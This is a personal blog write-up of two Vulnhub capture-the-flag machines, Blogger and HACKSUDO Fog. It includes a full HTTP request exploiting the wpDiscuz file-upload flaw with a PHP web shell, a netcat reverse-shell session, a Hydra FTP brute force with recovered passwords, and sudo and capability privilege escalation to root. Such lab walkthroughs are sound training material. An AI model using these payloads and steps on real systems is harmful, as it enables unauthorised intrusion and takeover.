Vulnhub: HACKSUDO: Fog and Blogger
HACKSUDO: Fog and Blogger
I’ve recently done HACKSUDO: Fog and Blogger from Vulnhub but I’m struggling for motivation a bit at the moment so this will be pretty brief.
Blogger first.
Ports
SSH and HTTP.
HTTP
This is basically a hidden Wordpress installation; it’s at http://blogger.thm/assets/fonts/blog/
Note we were told:
Add blogger.thm to /etc/hosts file
So we can assume this was intended for TryHackMe? If it comes up there it’ll be an easy pwn. Anyway, with a thorough wpscan (get ye an API token):
wpscan -e --url http://blogger.thm/assets/fonts/blog/ --api-token LOL_GET_YOUR_OWN --plugins-detection aggressive
you can find what you want, which is a vulnerable plugin called wpDiscuz. Now according to that page it has a metasploit module but it’s not loaded by default in my version of Kali anyway. I did load it but it still wouldn’t run so just do it manually with Burp Suite. It’s a pre-auth unrestricted file upload so you can get a shell or whatever.
POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2048175503286114511976579529
Content-Length: 747
Origin: http://blogger.thm
Connection: close
Referer: http://blogger.thm/assets/fonts/blog/?p=27
Cookie: wordpress_test_cookie=WP+Cookie+check; wpdiscuz_hide_bubble_hint=1
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="action"
wmuUploadFiles
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmu_nonce"
06b879b0c5
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmu_files[0]"; filename="cmd.php"
Content-Type: image/gif
GIF8 <?php system($_GET['cmd']);?>
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="postId"
27
-----------------------------2048175503286114511976579529--Note the first time I tried this it wouldn’t work; I had to reinstall the box in VirtualBox and after I’d done that it was all good.
Privesc
There are a few rabbit holes here; at least that’s how it looks. We have a root cron job running a wildcard tar; but in order to exploit it we need to be James. We can get the hash from mysql after we get the creds from wp-config.php but the hash doesn’t want to crash. The mysql password is not reused for James. And even after I got root and read the shadow file, the system hash for James doesn’t want to crack either. So the tar/cron path appears to be a rabbit hole. We also have a file called /opt/.creds that looks like gibberish:
‘;u22>’v$)=’2a#B&>c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+
(|yx’)Av#>’v%?}:#=+)’;y@%’5(2vA!’<y$&u”H!”ll
Maybe I’m supposed to be able to decrypt that; dunno. Anyway we have a user (vagrant) with a weak password (vagrant) who can do anything:
┌──(root💀kali)-[/opt/vulnhub/blogger]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.236] 57662
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ress/assets/fonts/blog/wp-content/uploads/2021/05$ su vagrant
su vagrant
Password: vagrant
<ress/assets/fonts/blog/wp-content/uploads/2021/05$ sudo -u root su
sudo -u root su
<ress/assets/fonts/blog/wp-content/uploads/2021/05# id
id
uid=0(root) gid=0(root) groups=0(root)Looking through auth.log and in the home directories:
root@ubuntu-xenial:/home/vagrant/.ssh# cat au
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfmqiMY0t8f+InjxZAAMCHW8Zvbd0GRljA7baIioIIUD2jyEDx56UcYd73AXwNiemyJ857dGvgmiNdjbpvynN9Q66SD5X0sA+pjZhCW6QLLwjuqXkT0sEg+U6dRgzN4JT6NSzmmKouoZUFFclhQeB3n0rrbFW1IUyLk9UET/mfYlw7v1/+0rKvsw69Z9M8GnHuhoroTAR6bRz4oontqsAuxlIRPo/vCVggyWOUg3Q81loLLv0indfWJroWWtqR/6JP2Ginfuk66+WS6BAut6nRs4IMAKvqLyl0Roiv/DAKvGxFVUdgvSMQ5jSEDjNsmZ463wExeg0ObrTghHWIlFI3 vagrantIt seems pretty clear we were supposed to use vagrant and the rest was a distraction.
Hacksudo FOG
We had to bruteforce FTP on this box:
┌──(root💀kali)-[/opt/vulnhub/hacksudofog]
└─# hydra -l hacksudo -P ./dict.txt ftp://192.168.1.233
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-17 07:59:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.1.233:21/
[21][ftp] host: 192.168.1.233 login: hacksudo password: hackme
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-17 08:00:21The file dict.txt was on the server; but you needed a pretty thorough enumeration to find it. Next, we got some files from the FTP server and did some stego to get back some more creds:
wwww.localhost/fog Username=fog:password=hacksudoISRO
Which was rot23 from ‘zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR’
Next we could login to the CMS on the website and get ourselves a shell; nothing too complicated.
On the box, look had the SUID bit so we could read the root flag or shadow file. The hash for isro cracked extremely quickly (qwerty) and isro could do this:
isro@hacksudo:/dev/shm$ sudo -l
sudo -l
[sudo] password for isro: qwerty
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*Erm yeah ok. Anyway fog had the cap_setuid capability and running it opened a python shell so that was that:
isro@hacksudo:~/fog$ fog -h
fog -h
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> id
id
<built-in function id>
>>> import os
import os
>>> os.system("/bin/bash")
os.system("/bin/bash")
root@hacksudo:~/fog# id
id
uid=0(root) gid=1003(isro) groups=1003(isro)
root@hacksudo:~/fog# id;hostname;date
id;hostname;date
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo
Mon 17 May 2021 08:31:04 AM EDTI probably left out some detail here but whatever. It was good; I’m just a bit weary. And possibly a bit over CTFs at the moment.